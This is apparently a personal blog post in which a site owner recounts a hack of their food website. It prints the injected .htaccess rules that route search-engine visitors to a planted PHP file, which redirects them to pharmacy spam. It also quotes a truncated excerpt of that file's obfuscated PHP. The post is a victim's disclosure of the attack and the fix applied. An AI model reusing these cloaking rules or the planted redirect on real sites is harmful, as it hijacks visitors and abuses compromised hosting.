[SOLVED][HACKED] .htaccess

Hacking is always painful for programmers and website owners . One of my website greatindiantaste.com got hacked and my all the visitors who came from any search engine like google, msn, bing etc were redirecting to some medicine websites and as i was busy and was not monitoring it .

i don’t know from how many days or month it was happening and one day i was searching something and found my site title in google search results but the content of the results are horrible . when i clicked the link it redirect me to some medicine sites selling viagra and other such medicines .

So i debug my hosting and found below code written in my .htaccess :

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (msn|bing|yahoo|aol|google) [OR]
RewriteCond %{HTTP_REFERER} (msn|bing|yahoo|aol|google)
RewriteCond %{HTTP_HOST} greatindiantaste\.com$
RewriteRule . quotes2-quotes.php?$1 [L]
# Deny access to all .htaccess files

SO what is this code and what it does to my website ?

The code is for redirecting al users from my site to hacker’s site using quotes2-quotes.php file which also created in my hosting .

When user first land to site the server always reads the htaccess for rewriting rules and it finds that all the user reffring from listed search engine should go to quotes2-quotes.php and this php file has so much code you can understand if you do not have deep knowledge . Below is the little code from the file :

goto O8876; O8037: $vZ0gG = 'Z1GbM0D='; goto O7826; O5771: $nsN0D = 'Drx9zL=='; goto O8393; O0986: $v0ASp = 'Nn=='; goto O8518; O2560: O8655: goto O1472; O6091: $O2638(); goto O4876; O6317: if (!(!$O8543 && !($O7567 = $Dcw1e($O0286)))) { goto O1745; } goto O7326; O0046: $a11by = 'jpxW3o3AJq=='; goto O8913; O4017: $J11TC = 'ZSHHESF='; goto O9474; O2201: if (!isset($O1246[$O4593])) { goto O1534; } goto O5374; O0827: O6439: goto O4934; O2634: $O9694 = $QIHRJ($O2553, $Pd1Th) === 0 ? $Hl0DD($O2553, 4) : $O2553; goto O5074; O4029: $ey1Tr = ''; goto O6337; O2746: $Pd1Th = 'tY3q3q=='; goto O9551; O9526: function CFhOS() { goto O4941; O9038: $O3049 = $vuSA0($ld0K0, $O4741[$P00V1]); goto O5462; O7811: $O3049 = $abwtP($s1rnX, $O3049); goto O3671; O4941: global $O4741, $P00V1, $vuSA0, $wD1a0, $ld0K0, $o1Ex1, $CRL01, $H1s1k, $s1rnX, $abwtP; goto O9038; O3671: return $CRL01(0, 1) ? $O3049 : $o1Ex1($O3049); goto O8963; O5462: unset($O3049[$wD1a0(0, $H1s1k($O3049) - 1)]); goto O7811; O8963: } goto O4943; O3604: $nw10p = 'NV=='; goto O3416; O8947: $kh1Xe = 'm9TplE3p'; goto O1114; O8553: $d0be0 = '2IzplE3p'; goto O4149; O6043: $a1U1A = 'HzrcAKMfyzM='; goto O6115; O1037: $O0509 = $a1pI1($D010V, $XZ1P0($O8655, 2)); goto O8413; O5991: function O6020($O2573) { goto O4382; O6540: return $v0C1r($O2573, $O5417, $d0be0($O5417)); goto O8205; O2607: $O5417 = $kKwW0 . $Ibl01($EYWmr, $A0oxZ($w0H1s($Mj0Yk, $D1000), $LwV11($SqX0F, $VBS0X))) . $Iu0ce; goto O6540; O4382: global $A0oxZ, $D1000, $v0C1r, $d0be0, $SqX0F, $Mj0Yk, $I

Solution :

I found that my .htaccess has write privileges for owner so what i did ? I made readable only file for everyone and till this day no such hacking happened to my .htaccess or any other folder :).

Show Buttons
Hide Buttons